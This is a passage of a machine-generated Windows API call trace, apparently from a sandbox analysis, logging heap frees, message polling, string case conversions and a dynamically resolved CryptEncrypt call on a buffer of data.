lpsz="A060070245B") returned 0xb [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.060] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.061] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.061] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.061] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.062] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.063] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.063] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.063] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.063] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.064] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.064] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.070] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.071] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.071] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.072] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.072] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34ca218 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.077] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0252.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa7d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0252.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.079] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0252.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6a30 [0252.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0252.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0252.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0252.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0252.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0252.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0252.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0252.080] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x3fd3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x3fd8) returned 1 [0252.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0252.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.081] HeapFree (in: hHeap=0x25c0000, 